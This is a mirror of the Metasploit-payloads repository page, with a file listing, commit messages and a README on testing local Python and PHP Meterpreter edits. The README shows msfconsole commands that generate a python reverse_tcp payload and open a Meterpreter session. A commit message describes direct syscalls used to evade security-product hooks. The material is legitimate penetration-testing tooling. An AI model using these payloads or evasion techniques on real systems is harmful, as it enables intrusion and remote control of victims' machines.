1
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-12-21 05:35:54 +01:00
Go to file
Spencer McIntyre 1adafcd2fb
Land #694, Use direct syscalls in the RDI loader
This updates the RDI loader used by the Windows Meterpreter to use
direct system calls to prevent questionable behavior from being
identified through hooks implemented by external applications.
2024-01-19 12:05:10 -05:00
.github Add github actions for Windows C Meterpreter payload 2023-12-08 03:01:37 +00:00
c/meterpreter Update the ReflectiveDLLInjection submodule to the upstream repository 2024-01-19 17:43:25 +01:00
docker Land #417, rename public build container 2020-06-30 07:56:21 -05:00
gem Bump metasploit-payloads to 2.0.165 2024-01-08 04:52:57 -06:00
java Set line endings to LF as the other files Java use 2023-11-22 10:28:30 -05:00
php/meterpreter added a custom pack for php meterpreter to support larger stat buf files 2023-06-27 10:02:09 -07:00
powershell Updated powershell extension binding IDs 2020-05-08 17:17:25 +10:00
python/meterpreter Fix python unittest deprecation warning 2023-09-19 23:53:52 +01:00
.gitignore Initial windows route support via GetIpForwardTable2 2021-03-17 10:26:42 -04:00
.gitmodules Update the ReflectiveDLLInjection submodule to the upstream repository 2024-01-19 17:43:25 +01:00
appveyor.yml add initial appveyor config file 2019-01-07 16:24:35 -06:00
COPYING Add a COPYING and LICENSE file for Python 2015-10-30 15:23:00 -05:00
cortex.yaml PD-41096 Auto-add cortex.yaml 2023-10-02 14:11:56 +01:00
LICENSE Update the year in the LICENSE 2018-01-08 15:22:38 -05:00
Makefile adjust spaces 2020-10-08 17:32:45 -05:00
README.md Update README 2023-04-27 14:28:01 +01:00

metasploit-payloads

Appveyor build status: Build Status

This is a unified repository for different Metasploit Framework payloads, which merges these repositories:

An alternate cross-platform C Meterpreter, called Mettle, is developed at https://github.com/rapid7/mettle

See the individual directories for meterpreter-specific README, build instructions and license details:

For Python and PHP Meterpreter, you can test changes to these files by symlinking the associated files to ~/.msf4/payloads/meterpreter. As an example, here is how this might look like for a Python Meterpreter edit:

mkdir ~/.msf4/payloads # If this doesn't exist already
cd ~/git/metasploit-payloads
ln -s /home/gwillcox/git/metasploit-payloads/python/meterpreter/ext_server_stdapi.py /home/gwillcox/.msf4/payloads/meterpreter/ext_server_stdapi.py
file ~/.msf4/payloads/meterpreter/ext_server_stdapi.py
       /home/gwillcox/.msf4/payloads/meterpreter/ext_server_stdapi.py: symbolic link to /home/gwillcox/git/metasploit-payloads/python/meterpreter/ext_server_stdapi.py

If things went right you should see a warning message when selecting one of the corresponding Meterpreter payloads and recieving a session:

msf6 > use payload/python/meterpreter/reverse_tcp
msf6 payload(python/meterpreter/reverse_tcp) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 payload(python/meterpreter/reverse_tcp) > generate -f raw -o reverse.py
[*] Writing 436 bytes to reverse.py...
msf6 payload(python/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.153.128:4444 
msf6 payload(python/meterpreter/reverse_tcp) > WARNING: Local file /home/gwillcox/.msf4/payloads/meterpreter/meterpreter.py is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (24380 bytes) to 192.168.153.1
WARNING: Local file /home/gwillcox/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (192.168.153.128:4444 -> 192.168.153.1:50334) at 2022-12-13 12:49:49 -0600